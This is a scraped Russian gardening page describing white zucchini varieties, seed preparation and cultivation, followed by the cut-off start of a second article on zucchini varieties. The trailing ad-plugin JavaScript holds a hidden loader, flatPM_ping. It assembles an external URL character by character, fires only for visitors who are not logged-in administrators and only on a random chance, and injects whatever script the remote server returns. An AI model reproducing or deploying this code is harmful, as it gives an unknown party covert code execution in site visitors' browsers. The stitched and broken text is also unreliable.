1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Разновидности белых кабачков и правила их выращивания

Особенности выращивания белого кабачка

В последние несколько лет все чаще на отечественных участках встречается белый кабачок. Его основное назначение – консервация. С развитием селекции все больше создают новых сортов белоплодных культур. Они могут выращиваться как в северных, так и центральных регионах страны.

Особенности выращивания белого кабачка

Лучшие сорта

Если Вы относитесь к той категории огородников, которые не могут себе позволить каждый день посещать свои сады, белоплодные кабачки – лучший вариант для вас. Они неприхотливы в уходе: Вам не потребуется тратить много времени и сил на их выращивание.

Люди старой закалки стараются собирать семена с прошлогодних плодов, чтобы высадить их в следующем году, но сейчас это делать не обязательно. Ежегодно выводят новые усовершенствованные культуры, купить семена которых можно в любом садоводческом магазине.

Белоплодный

Созревает кабачок Белоплодный всего за 40 дней с момента посадки семян в открытый грунт. Лучше всего высевать эту культуру после томатов или картофеля. Кустовое растение небольшое, не сильно вьется. Описание указывает на устойчивость кабачка к мучнистой и ложной росе.

Плоды созревают компактные – всего 20 см в длину и 300 г по весу. Оттенок гладкой кожуры может быть светло-зеленым или насыщенным салатовым. Высокие показатели урожайности наблюдаются, если провести посадку вида в нейтральный грунт. Тогда с каждого куста Вы соберете минимум 5 кг.

Высаживание сорта Арал нужно проводить в открытом грунте, т.к. он не самоопыляемый. В этих условиях кусты будут опылять насекомые. Показатели урожайности высокие – до 15 кг с 1 куста. Арал не подвергается воздействию мучнистой росы и арбузной пятнистости.

  • в длину овощи вырастают до 15-20 см;
  • средний вес каждого кабачка – 400-600 г;
  • белый оттенок кожуры;
  • гладкая поверхность;
  • кремовая мякоть;
  • приятные вкусовые качества.

Раннеспелый вид Сама созревает на 50-й день после высаживания семян или рассады. Устойчива разновидность к резким перепадам температур и может переживать недолгую засуху. Несмотря на низкие показатели самоопыления, можно проводить посадку в парниках.

Идеален сорт Сама для сбора семян, т.к. на следующий год они дают больший урожай. В первый год садоводы собирают 10-12 кг кабачков, а на второй – уже около 20 кг. Отмечается устойчивость сорта к вирусной мозаике.

Плоды компактные – всего 10 см в длину. Вес каждого овоща составляет 400 г. Мякоть сочная, не плотная. Вкусовые качества приятные.

Грибовский 37

Сорту не страшны заморозки

Спелость этой культуры наблюдается на 50-й день после посадки. Во время селекции этого вида были использованы сорта, которые идеально плодоносят в условиях умеренного климата, поэтому разновидность Грибовский 37 может переносить небольшие заморозки.

Куст широкий. На стеблях наблюдаются небольшие шипы. Описание указывает на способность сорта противостоять бактериям и грибковым инфекциям.

Гладкие цилиндрические плоды вырастают до 12 см в длину. Вес каждого овоща находится в пределах 800-900 г. Кожура может быть как белой, так и светло-зеленой.

Белогор

Ранняя культура Белогор была выведена для северных и центральных областей страны, поэтому ее можно высаживать в открытый грунт без дальнейшей защиты от заморозков. Кустовое растение компактное. При посадке следует придерживаться расстояния между кустами в 60 см.

Овощи вырастают крупными, до 800 г по весу. Длина каждого кабачка – 10-14 см. Тонкая кожура характеризуется белым оттенком. Мякоть приятная на вкус. Этот сорт используется для зимней консервации.

Чаклун

Среди распространенных раннеспелых разновидностей следует выделить сорт Чаклун. Это продукт украинской селекции, который прошел все этапы сертификации за короткие сроки. Плоды созревают дружно, и огороднику не придется растягивать сбор кабачков на неопределенное время.

Плоды, которые вырастают длинной 15-18 см, обладают цилиндрической формой. Масса одного овоща составляет 700 г. Кожура, несмотря на свою тонкость, прочная. Мякоть сладкая, нежная. Подходит этот вид как для консервации, так и употребления в свежем виде.

Горный

Часто Горный кабачок встречается на огородных участках Сибири и Кавказа. Это связано с тем, что он устойчив к низким температурам и хорошо переносит долгое отсутствие влаги. Вегетация зависит от погодных условий. Первые плоды созревают через 2 месяца после посадки.

Форма плода отличается от других культур. Толщина овоща одинаковая по всей длине. По весу кабачки сорта Горный могут достигать 800 г. Кожура ребристая, белого оттенка. Подходят плоды для длительного хранения.

Заячье ушко

Белоплодные кабачки этого вида имеют такое название благодаря необычному внешнему виду. Овощи тонкие и длинные (до 25 см). Масса составляет 600 г. Кустовое растение крупное, раскидывается на расстояние 2 м.

Посадку нужно проводить в черноземы. В кислых почвах урожайность снижается в разы, и огородник не сможет насладиться вкусной, сочной и кисловатой продукцией.

Ролик

Сорт Ролик отличается стабильной урожайностью

Не нуждается сорт Ролик в необычном уходе. Даже при минимальных усилиях огородника культура дает стабильный и дружный урожай. Первые плоды собирают на 35-й день после посадки, поэтому предпочтительно выращивать Ролик рассадным методом. Кусты небольшого размера. Побеги длинные.

Каждый плод достигает длины в 25 см. Вес кабачка составляет 1 кг. Мякоть состоит из большого количества волокон.

Богатырь 33

Разновидность Богатырь 33 относится к среднеспелым видам. Плодоношение, которое наступает на 55-й день после посадки, продолжается в течение 2 месяцев. Описание указывает на устойчивость культуры к вирусным инфекциям.

Толстые и удлиненные плоды, которые обладают цилиндрической формой, достигают веса в 1,5 кг. Кабачки Богатырь 33 не так распространены на участках, как другие культуры, но садоводы уже отмечают их высокую урожайность – 12 кг с 1 кв. м.

Мальчуган

Благодаря своей скороспелости, сорт Мальчуган дает дружные всходы. На компактных кустах находятся короткие боковые побеги. Наблюдается устойчивость к небольшим заморозкам.

На каждом кусте формируется по 4 плода, вес одного составляет 700-1500 г. Форма овощей напоминает цилиндр, а иногда бывает круглой. Мякоть кремовая, сочная, идеально подходит для консервации.

Белый лебедь

Преимущественно сорт Белый лебедь выращивается в центральных областях страны. Его характеристики указывают на устойчивость к заболеваниям. Нельзя проводить посадку кабачка в щелочные почвы. Старайтесь сажать его в суглинистый или черноземный грунт после картофеля или других культур семейства пасленовых.

Плоды компактные, до 600 г по весу. Белоплодные кабачки этого сорта характеризуются сочной кремовой мякотью, в составе которой содержится минимальное количество сахара, поэтому продукцию часто используют для приготовления детского или диетического питания.

Астроном

Развивается сорт Астроном всего за 40 дней с момента посадки в открытый грунт. Кусты компактные. Подходит эта разновидность для посадки в умеренных и северных областях страны, где часто происходят резкие перепады температуры.

Кабачки крупные, до 1 кг по весу. Кожура обладает светло-зеленым оттенком. Мякоть приятная, сочная. В ее состав входит йод, поэтому сорт Астроном полезен для организма человека.

Белый медведь

Отличается сорт Белый медведь от других культур тем, что способен устоять против низких температур. Российские селекционеры выводили его специально для северных регионов. Кусты небольшие, средне облиственные. Листья зеленого оттенка.

Плоды обладают хорошими вкусовыми качествами

Плоды габаритные, массой до 1,5 кг. Кожура гладкая, по цвету белая или светло-зеленая. Вкусовые качества приятные.

Корнишонный

Сбор урожая кабачка Корнишонный проводят на 48-й день после посадки культуры в открытый грунт. В теплицах этот вид лучше не выращивать, т.к. растение нуждается в опылении насекомыми. Подходит Корнишонный белоплодный сорт для выращивания во всех регионах страны.

После созревания плоды достигают веса в 1,2 кг. Форма может быть как цилиндрической, так и круглой. Кожура овоща гладкая, приятная на ощупь. Мякоть используется для салатов или консервации.

Подготовка семян к посеву

Посадочный материал, который предприятия отправляют на прилавки магазинов в упаковках, уже обработан специальными веществами для устойчивости семян и их лучшей всхожести. Если Вы собираетесь сажать семена, полученные из прошлогоднего плода, их нужно обязательно подготовить. Для этого существует несколько способов.

Если правильно продезинфицировать, протравить и закалить материал, можно получить высококачественные семена, которые будут давать хороший урожай. Обработанные семечки более устойчивы к разного рода инфекциям.

Калибровка и дезинфекция

Калибровка заключается в том, что семена помещают в раствор из соли. Для его приготовления Вам потребуется 5 ст. л. соли и 1 л воды. Семечки, которые всплыли, нужно выбросить. Оставшиеся следует продезинфицировать, поместив на полчаса под горячую проточную воду.

После этого на 30 мин. оставляют посадочный материал в теплой воде (температура должна быть около 40 °С). Дальнейшая процедура подготовки должна проводиться по усмотрению огородника.

Протравливание

Процесс протравливания заключается в использовании 2 веществ:

Нужно 30 г каждого вещества растворить в 2 л теплой воды, а затем поместить в раствор семечки на 2-3 ч. Благодаря этому этапу подготовки Вы обеспечите посадочному материалу высокую устойчивость к болезням и паразитам.

Закаливание

С помощью этого метода подготовки материала можно сделать так, что культура будет более устойчива к перепадам температуры. Длительность проведения работ должна составлять 3-5 дней.

Закалка позволяет повысить иммунитет растений

Суть закаливания заключается в том, что днем семечки оставляют в помещении при комнатной температуре. На ночь их выносят на улицу и оставляют при низких температурах. Благодаря таким резким перепадам посадочный материал вырабатывает иммунитет к погодным изменениям.

Проклевывание

Подготовка рассады должна осуществляться в конце марта. Для этого посадочный материал складывают в небольшой тканевый мешочек и помещают в духовой шкаф (при температуре 70 °) на несколько минут. После этого готовят стаканы для рассады.

Чтобы прорастить семечки в домашних условиях, потребуется провести несколько несложных действий:

  • смешайте 1 кг обычной земли, 2 кг торфа, 1 кг перегноя и 5 кг опилок (в зависимости от объема семян, количество веществ может меняться). Главное не нарушать пропорции;
  • всыпьте приготовленную почву в стакан, заполняя его на 2/3;
  • поместите в субстрат семя. Глубина должна быть около 2 см;
  • полейте теплой водой.

Первые всходы Вы увидите уже через несколько дней. Как только на них появятся листья (это происходит через 30-45 дней), проводят посадку в открытый грунт. До этого момента всходы нужно каждую неделю поливать и держать при температуре 25 °С.

Высаживание семян

После того, как осенью почву вспахивают и подкармливают перегноем (5 кг на 1 кв. м), можно приступать к посадке культуры. Обычно это делают в мае, когда земля достаточно прогреется. Нужно снова перекопать участок и разровнять верхний слой земли.

После этого намечаются ровные рядки, на которых делают лунки. Расстояние между ямами должно составлять не менее 90 см. По лункам разбрасывают по 2-3 семя, чтобы увеличить шансы на дружные всходы.

Глубина посадки семян должна быть 4-5 см. Грядки накрывают полиэтиленовой пленкой, чтобы создать эффект парника. Так всходы будут появляться быстрее.

Выращивание кабачков

Ухаживать за белоплодными кабачками нужно с помощью стандартных процедур. За счет того, что такие культуры и так быстро растут, от огородника потребуются минимальные затраты времени и сил.

Поливают растения не чаще, чем 1 раз в неделю. Обязательно это делать под корень, чтобы стебель не иссушался при воздействии на него солнечных лучей. В первые несколько недель нужно вливать под каждое растение по 5-6 л воды (желательно комнатной температуры).

Следующий месяц полив осуществляется с расчетом 10 л теплой воды на 1 растение. За неделю до уборки урожая нужно прекратить эту процедуру. После поливных работ нужно рыхлить верхний слой земли, чтобы снять корку, иначе корневая система будет гнить.

Ухаживать за растениями нужно хорошо

Подкормки используют всего 2 раза за период вегетации. Как только появятся первые листья, вносят под каждое растение по 100 г перегноя или компоста. Следующая подкормка заключается в использовании суперфосфата и нитрата калия (по 40 г каждого препарата на 5 л воды). Вливают по 300 мл на куст. Эту подпитку проводят через неделю после первой.

Формирование куста заключается в удалении боковых побегов, которые слишком сильно выросли. Это делают, чтобы кусты были более компактными и не теряли большого количества питательных веществ.

Если Вы выращиваете кабачковые культуры в теплицах, обязательно нужно проводить опыление цветков. Для этого по вечерам нужно срывать мужские соцветия и подносить их к женским цветкам.

Отзывы огородников

Многие огородники, которые выращивают на своих участках белоплодные кабачки, отзываются о них только положительно. Эти культуры неприхотливы в уходе и всегда дают стабильный, дружный и хороший урожай.

Отмечается высокая устойчивость этих разновидностей к неблагоприятным факторам окружающей среды, поэтому они могут выращиваться во всех регионах страны.

Самые хорошие отзывы об этих культурах оставляют садоводы, которые не могут себе позволить каждый день посещать свои участки. Для них важно выбрать те сорта, которые бы характеризовались нетребовательностью в уходе, и белые кабачки обладают этим достоинством.

19 Самых лучших сортов кабачков: описание и характеристика. Выбирайте свой любимый сорт (Фото & Видео) +Отзывы

Кабачки — 19 лучших

Кабачок является близким родственником тыквы, отличаться они будут сроками созревания и вкусовыми качествами. Большинство заготовок на зиму делают именно с этого овоща, в сезон на столе практически каждый день будет какое-то блюдо из него. Давайте рассмотрим описание его популярных сортов.

Содержание этой статьи:

Описание

Кабачки очень полезны для человека, в них содержится:

  • много витаминов и микроэлементов, положительно влияющих на общее состояние организма
  • клетчатка, способствующая нормализации пищеварения и очистительных функций организма
  • небольшое количество калорий, что позволяет использование продукта в диетическом питании для нормализации веса

Отличные вкусовые качества и разнообразие в приготовлении делают кабачки просто любимым блюдом для многих потребителей в период их плодоношения.

Как выбрать

Вы сможете выбрать кабачки для себя на вкус и даже на цвет

Чтоб получить максимально возможный урожай кабачков важно правильно подобрать сорт, при этом учитываются личные предпочтения в цвете.

Еще стоит принимать во внимание такие моменты:

  • Подбирая сорт кабачков для дачи или приусадебного участка обязательно стоит учитывать климатические особенности вашего региона. Морозостойким сортам не страшны колебания температур и даже заморозки на грунте не дадут растению сократить плодоношение. На теплолюбивых неустойчивые показания градусника скажутся негативно, растение значительно сократит количество плодов, а иногда может и погибнуть.
  • Какое предназначение будет у плодов тоже немаловажно, для употребления в пищу в сезон подбирают одни сорта, для заготовок на зиму высаживают совершенно другие. Их будут отличать вкусовые качества, плотность мякоти.
  • Урожайность и продолжительность плодоношения тоже влияют на выбор сорта, ведь чем дольше растет куст, тем больше плодов можно с него собрать.

Особое внимание уделяют срокам созревания, именно от них зависит как скоро вы сможете приготовить себе и близким вкусные блюда из кабачков.

По скороспелости различают три вида овоща:

  • раннеспелые
  • среднеспелые
  • позднеспелые

Учитывая их сроки вызревания для любителей кабачков можно обеспечит почти бесперебойное обеспечение этим овощем. Опытные огородники часто высаживают не менее 3-5 видов с разным сроком плодоношения, именно так употребление в пищу кабачков продолжается с ранней весны до поздней осени, при этом часто используют парники и теплички.

Кроме этого, в магазинах с семенами продавцы предложат несколько вариантов посевного материала. Больше всего ценятся гибриды зарубежных селекционеров, огромный выбор не позволит определиться сразу.

Отечественные сорта имеют меньше представителей, но и среди них трудно отдать предпочтение какому-то одному. Учитывая большую конкуренцию на этом сегменте рынка лучше заранее подготовиться и самостоятельно изучить некоторые из них, составить список наиболее подходящих для вас.

Кабачки на гриле

По отзывам огородников получилось составить небольшой перечень из всех предложенных, которые наиболее распространены у нас. Именно этим сортам и видам отдают предпочтение огородники-любители и фермеры, для которых урожай немаловажен.

Делая подборку учитывались и вкусовые качества каждого сорта, описание даст разъяснение как правильно выращивать и как применять созревшие плоды, чтоб получить максимум пользы от овоща.

Кустовые сорта

Последнее время эти сорта кабачков пользуются большим спросом, объясняется это тем, что занимают он мало места, а плодоношение иногда даже больше чем у остальных представителей. Они не привередливы, просты в уходе, а зарубежные гибриды отличаются относительно длительным периодом хранения.

Аэронавт

  • Относят к кустовым раннеспелого типа, полтора месяца отделяют всходы растения и первый сбор урожая.
  • Популярность к сорту пришла из-за достаточно долгого сохранения сорванными плодами свежести, рейтинг поднимают отличные вкусовые качества и набор полезных веществ.
  • Плоды сорта имеют вытянутую эллиптическую форму зеленого окраса, ровные, гладкие, с тонкой кожицей.
  • В среднем плод товарного вида имеет длину не более 16 см, мякоть беля, сочная, в середине содержит семечки.
  • Плоды универсальные, их употребляют в сезон в разных видах и заготавливают впрок.
  • Само растение имеет компактный вид, основной побег короткий, плетей формирует минимально.
  • Выращивать можно как в открытом грунте, так и в теплицах и парниках, на урожайности это не отразится.

Астроном

  • Кабачок Астроном можно отнести сразу к нескольким видам данного овоща, он и раннеспелый, и кустовой, и витаминизированный. Выращивают его практически на любой почве, предпочтительно чтоб до этого там рос картофель, лук, бобовые.
  • Куст компактный, имеет короткий основной стебель, не ветвиться, урожай собран пучком.
  • Плоды плотные, светло-зеленого окраса с белыми пятнами, самыми вкусными считаются кабачки до 18 см длиной.
  • Вес такого плода может достигать килограмма.
  • Прекрасно подходит для приготовления разнообразных блюд в сезон, а также используется для приготовления закаток на зиму. Выращивать сорт Астроном можно как в открытом грунте, так и в теплицах.
  • Высевают предварительно в теплицы или рассадным способом, при надлежащей температуре высаживают в землю.
  • Важной особенность является то, что сорт устойчив к мучнистой росе и не требует дополнительных обработок против этого заболевания.

Черный красавец

  • Черный красавец относят к среднеспелым кабачкам, куст очень компактный и очень облиственный, порой листва прячет от огородников созревшие плоды.
  • Кабачок цукини имеет удлиненные плоды темного зеленого окраса, который порой доходит до черного.
  • Кожица тонка, нежная, мякоть имеет зеленоватый окрас и плотную консистенцию.
  • Плод используют для приготовления различных блюд, для заготовок на зиму применять не стоит.
  • Выращивают Черного красавца только в открытом грунте прямым посевом, теплицы и рассада погубят растение на ранних сроках.
  • Среди отличительных особенностей отмечается высокая урожайность при надлежащем уходе за растением.

Цукеша

  • Цукеша проявил себя как общеизвестный сорт кабачков, его успешно выращивают практически во всех климатических зонах, в которых вообще занимаются огородничеством.
  • Морозоустойчивость и неприхотливость в почвах сделала его любимцем многих, при всем этом растение занимает очень мало места.
  • Среднеспелый сорт достаточно урожаен, его плоды собирают до первых заморозков, при этом вкусовые качества не меняются.
  • Плод растения достигает в длину 30-40 см, при этом его кожица зеленая, при технической спелости становиться желтой или оранжевой.
  • Форма кабачка вытянутая цилиндрическая, мякоть сочная, имеет отличные вкусовые качества, прячет ее от людских глаз плотная кожица.
  • Отличить Цукешу от других сортов помогут листья, по целеному полю будут разбросаны бело-серые пятна.
  • Отличительной особенностью является то, что чем чаще срывать плоды, тем больше их будет появляться на кусте.
  • Кустовые виды кабачков привлекают огородников компактностью и высокими показателями урожайности, при минимально занимаемом месте м каждого куста можно получить до 10 кг плодов отличного качества.

Желтые сорта

Один из представителей желтых кабачков

По-особенному огородники относятся к кабачкам желтого цвета, они и в банке будут смотреться по-летнему, и икра из них имеет более естественный цвет, и в приготовленные из свежих овощей блюда добавят частичку солнышка.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};